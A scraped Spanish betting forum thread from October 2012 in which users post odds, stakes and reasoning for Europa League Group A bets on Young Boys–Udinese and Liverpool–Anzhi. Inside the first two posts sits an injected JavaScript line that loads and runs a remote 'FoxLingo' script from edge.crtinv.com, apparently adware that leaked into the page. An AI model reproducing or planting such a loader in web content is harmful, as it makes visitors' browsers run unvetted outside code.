Skip to main content
 

Internacional Europa League Grupo A 25 de octubre 2012
1
(Leído 1623 veces)

0 Usuarios y 1 Visitante están viendo este tema.

No Participante
Entendido en apuestas
Enviado: 22 de Octubre de 2012, 11:01
Internacional - Europa League Grupo A 25-10-2012 21:05

Young Boys 3 - 1 Udinese

Pronóstico:
equipo1 menos de1.5 goles
  • Casa de apuestas:
  • Cuota:1.6
  • Stake:3
Creo que en partido de la europa ligue que enfrenta al equipo suizo del Young Boys contra el Udinese italiano .
el equipo local no conseguirá marcarles más de un gol al Udinese.

Siendo la cenicienta o equipo más debil donde ha perdido sus dos encuentros del grupo,parece, a priori, que cederá puntos en este partido,tambien, donde el equipo de Di Natale tendria , si todo va bien, que sacar los tres puntos .

Veo dificil que le marque dos goles ,aunque al Liverpool le endosó tres, pero las condiciones defensivas del equipo Ingles en ese tiempo no eran de tirar cohetes y Considero al Liverpool over, un equipo que recibe muchos goles.Pero la defensa del Udinese ,no siendo un gran equipo defensivo,si es mejor que la defensa inglesa.

Creo que con 1.5 es suficiente para cubrirnos por gol de despiste o de estrategia




!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
No Participante
Entendido en apuestas
Enviado: 22 de Octubre de 2012, 11:37
Internacional - Europa League Grupo A 25-10-2012 21:05

Young Boys 3 - 1 Udinese

Pronóstico:
Gana Udinese Hándicap Asiático 0
  • Casa de apuestas:
  • Cuota:2
  • Stake:2
Seguimos con el partido de los chicos jovenes y el Udinese y siguiendo el anterior pronostico vamos a probar el Handicap Asiatico +0 por el equipo Italiano.

El Udinese ,no siendo un equipo puntero ,no está jugando mal y con la mayor calidad que tiene en el ataque ,tendria que tener más posibilidades de llevarse el partido.juega con un 3-5-2 y los suizos con un 4-4-2.

Los Italianos tendria que disputarle el balon en el centro el campo con un jugador mas,y no dejarles que hagan muchas ocasiones ,ya que parece que tienen buen acierto .

El Udinese tiene que ganar y no dejar escapar estos puntos absequibles si quiere luchar con el Liverpool y los rusos de Etoo
Yo veo un marcador corto como un 1-1 o un 0-1


!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
No Participante
Amigo de las bookies
Enviado: 24 de Octubre de 2012, 23:44
Internacional - Europa League Grupo A 25-10-2012 21:05

Liverpool 1 - 0 Anzhi Makhachkala

Pronóstico:
Over(+) 2.5
  • Casa de apuestas:
  • Cuota:1.83
  • Stake:4
Grupo A de esta Europa League y nos encontramos el partidazo del grupo sin duda. Liverpool se esta caracterizando por unos partidos muy abiertos en esta EL, en los que esta habiendo muchos goles, debilidad defensiva y efectividad arriba. Sus dos partidos han sido un 3-5 y un 2-3. Por su parte el Anzhi tiene gran talento ofensivo pero carencias atrás, con el Young Boys y Udinese no fueron tan claras pero creo que en un partido en el que el Liverpool saldrá a por todas se pueden hacer evidentes.
No Participante
Nuevo en el foro
Enviado: 25 de Octubre de 2012, 00:30
Internacional - Europa League Grupo A 25-10-2012 21:05

Liverpool 1 - 0 Anzhi Makhachkala

Pronóstico:
Over(+) 2.5
  • Casa de apuestas:
  • Cuota:1.8
  • Stake:3
Gran partido el que vamos a poder seguir en el estadio de Anfield entre el Liverpool y el Anzhi ruso.

El Liverpool llega al partido lleno de dudas ya que no esta siendo el Liverpool que todos conocemos, se situa noveno en la clasificación y sus últimos 3 partidos a conseguido dos victorias y un empate. Por lo que refiere a esta competición se encuentra en tercera posición con una victoria (3 - 5 contra el Young Boys) y una derrota en casa contra el Udinese (2 - 3), creo que jugando en casa sera capaz de meter algún gol

Por parte del Anzhi este año a salido a la luz y de ahí que vaya primero en el grupo de la E. League con una victoria en casa (2 - 0 contra el Young Boys) y un gran empate que consiguio en casa del Udinese (1 - 1). Es un equipo goleador en su liga llevando una media de 2 goles por encuentro, va primero en su liga en el que sus ultimos 5 partidos se cuentan como victorias.

A mi parecer será un partido de goles.


No Participante
Amigo de las bookies
Enviado: 25 de Octubre de 2012, 17:34
Internacional - Europa League Grupo A 25-10-2012 21:05

Liverpool 1 - 0 Anzhi Makhachkala

Pronóstico:
Under(-) 2.5
  • Casa de apuestas:
  • Cuota:2
  • Stake:3
Vamos con este Under 2,5 entre un Liverpool que sale con media plantilla suplente para los partidos de Uefa y el Anzhi ruso, tan conservador como efectivo en los partidos(lleva alrededor de una quincena de partidos sin perder). El liverpool no juega a nada y eso se ve en la Premier, partidos muy cerrados, pocos goles. Perdió contra el Udinese 2-3 en un partido en el que hubo muchos espacios y despistes y hoy no creo que quieran volver a repetir un partido así. Querrán ganar, pero sin arriesgar demasiado. El Anzhi es un equipo que tampoco mete muchos goles ni en Rusia ni en competición europea y como pronóstico alternativo creo que seguirá sin perder aquí. Vamos con el Under
No Participante
Amateur en apuestas
Enviado: 25 de Octubre de 2012, 18:54
Buena apuesta, el young boys no tiene equipo suficiente para plantarle cara al Udinese! los italianos van a cerrar bien su portería esta noche! te sigo


Young Boys vs Udinese
25-10-2012 21:05


equipo1 menos de1.5 goles

1.6
Creo que en partido de la europa ligue que enfrenta al equipo suizo del Young Boys contra el Udinese italiano .el equipo local no conseguirá marcarles más de un gol al Udinese.Siendo la cenicienta o ...
No Participante
Azote de las bookies
Enviado: 25 de Octubre de 2012, 20:50
Internacional - Europa League Grupo A 25-10-2012 21:05

Liverpool 1 - 0 Anzhi Makhachkala

Pronóstico:
Luis Suarez Marcara en cualquier momento
  • Casa de apuestas:
  • Cuota:2
  • Stake:4
Partido del grupo A de Europa League que enfrenta al Liverpool ingles, frente al Anzhi Makhackkala ruso, el Liverpool viene de golear al Young Boys por 3-5 y de palmar 2-3 en casa frente al Udinese, no se puede permitir más tropiezos en casa si quiere clasificarse para la siguiente ronda, el Anzhi viene de empatar frente al Udinese fuera de su campo, 1-1 y de ganar en su estadio 2-0 al Young Boys, va primero y puede perder la primera plaza si pierde hoy.
Creo que el partido sera de domininio ingles y pensando en que a menos marcara 2 goles, confio en que su goleador, Lusi Suarez, moje.


 


*Las cuotas mostradas en la web son meramente orientativas. Nuestro equipo trabaja muy duro para poder ofrecerte las cuotas más actualizadas posibles. Estas cuotas están sujetas a posibles cambios por parte de los operadores. No olvides comprobar la cuota actualizada en la casa de apuestas antes de realizar cualquier apuesta.